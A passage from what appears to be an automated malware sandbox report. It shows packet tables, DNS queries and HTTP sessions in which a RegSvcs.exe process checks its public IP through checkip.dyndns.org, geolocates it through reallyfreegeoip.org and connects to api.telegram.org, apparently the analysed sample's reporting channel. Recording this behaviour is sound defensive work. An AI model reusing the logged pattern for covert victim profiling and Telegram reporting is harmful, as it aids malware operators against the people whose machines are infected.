                                                                                                                      Jan 2, 2025 13:45:42.328447104 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.329282045 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.329356909 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.329452038 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.334252119 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.782963991 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.807538986 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.807605028 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.807754993 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.808149099 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.808183908 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.826904058 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:46.448735952 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.448817968 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.452686071 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.452706099 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.453041077 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.454663038 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.499326944 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.844979048 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.845046997 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.845112085 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.845592022 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.121072054 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.121330976 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.121778011 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.121841908 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.121917963 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.122164011 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.122204065 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.279357910 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.283109903 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.900099039 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.901691914 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.901715994 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.901833057 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.901844978 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286716938 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286787987 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286876917 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:48.287328005 CET49879443192.168.2.5149.154.167.220

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 2, 2025 13:45:04.105060101 CET5715753192.168.2.51.1.1.1
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET53571571.1.1.1192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:07.959597111 CET5959953192.168.2.51.1.1.1
                                                                                                                      Jan 2, 2025 13:45:07.966772079 CET53595991.1.1.1192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.798938036 CET6083053192.168.2.51.1.1.1
                                                                                                                      Jan 2, 2025 13:45:45.805685997 CET53608301.1.1.1192.168.2.5

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 2, 2025 13:45:04.105060101 CET192.168.2.51.1.1.10x28ccStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:07.959597111 CET192.168.2.51.1.1.10x361fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:45.798938036 CET192.168.2.51.1.1.10x3d23Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:04.111818075 CET1.1.1.1192.168.2.50x28ccNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:07.966772079 CET1.1.1.1192.168.2.50x361fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:07.966772079 CET1.1.1.1192.168.2.50x361fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                      Jan 2, 2025 13:45:45.805685997 CET1.1.1.1192.168.2.50x3d23No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549704193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:04.122697115 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:07.592010975 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:07 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 2fe371107cdc7c5523e735b4bd9803ad
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 2, 2025 13:45:07.596676111 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 2, 2025 13:45:07.923041105 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:07 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 553c6bd8f9bc62e2f01396d9fda831fc
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                      Jan 2, 2025 13:45:08.708275080 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 2, 2025 13:45:09.511228085 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:09 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: b829ae673074a5f56d38aae301c87bee
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549707193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:10.143711090 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 2, 2025 13:45:21.753254890 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:21 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: ff9fab635679d8cb9e62cf665ca1b4cc
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549725193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:22.415671110 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:31.166615009 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:31 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 557
                                                                                                                      Connection: keep-alive
                                                                                                                      X-Request-ID: ca22e756752416a2e24092d4b8384e18
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.549772193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:31.187661886 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:36.264492989 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:36 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 7f31bad449bc4fbc6f6b9dbe2bb2f921
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.549812193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:36.900193930 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:37.530512094 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:37 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: a4c944a0bb163b7c2cd5433e6835a506
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.549821193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:38.160829067 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:38.732606888 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:38 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: e7737516eeb04e62b1d3b723e884df70
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.549829193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:39.392632008 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:41.702373981 CET321INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:41 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 6f22e28e40a3a03c317a27c6b92bbcd2
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.549847193.122.130.0806608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 2, 2025 13:45:42.329452038 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Jan 2, 2025 13:45:45.782963991 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:45 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 557
                                                                                                                      Connection: keep-alive
                                                                                                                      X-Request-ID: 30660bce6aa5ffdb08b0040183ed9273
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.549705188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-02 12:45:08 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:08 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136697
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6jEiwXETP%2FkWTL19FgEF%2BCouXB1xQS0F%2FS2Z7EJfXe8JsdddLIJMRcprZLdLPz7C7O9qbLg9k7e7ZBgNkPr96PtB02TmTkt3AIYgSHa%2FkIJoXUiNRLSwSJ2C5nDzm5h2rMjggYJO"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad830e8ac0f99-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1691&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1726788&cwnd=164&unsent_bytes=0&cid=479ef45474c44060&ts=250&x=0"
                                                                                                                      2025-01-02 12:45:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549706188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:09 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-02 12:45:10 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:10 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136699
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eURiKwG9iBN94PiH56OdNyt15F7EppvFvzdN%2BF4LMw9kpTECYp2g0Z2h%2FiGgXiNFU5PgPoqFcI6kYpZXUmrSxgGSLuHq4%2FYrTg2xIljXwswN%2F7Hvhqj2bKsyzCkKWG4j3Xv5lxd1"}],"group":"cf-nel","max_age":604800}
